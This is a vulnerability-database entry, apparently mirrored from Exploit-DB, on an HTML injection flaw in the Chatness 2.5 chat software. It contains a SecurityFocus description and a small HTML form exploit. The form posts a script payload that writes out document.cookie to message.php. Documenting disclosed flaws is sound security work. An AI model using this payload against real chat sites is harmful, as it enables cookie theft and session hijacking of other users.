Chatness 2.5 - 'Message Form' HTML Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054987 漏洞类型
发布时间 2005-03-29 更新时间 2005-03-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25315
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12929/info

Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields.

Exploitation will allow an attacker to inject hostile HTML and script code into the session of another user. An attacker could take advantage of this vulnerability to steal cookie-based authentication credentials or launch other attacks. 

<html>
<head>
<title>Chatness 2.5.1 Html Injection Exploit</title>
</head>
<body>
<h1>Chatness 2.5.1 Html Injection Exploit</h1>
<form method="POST" action="http://www.example.com/message.php">
<b>XSS in message.php:</b><p>
Username:
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
<p>
<br>
example: <script>document.write(document.cookie)</script></p>
<p> <input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p> </p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>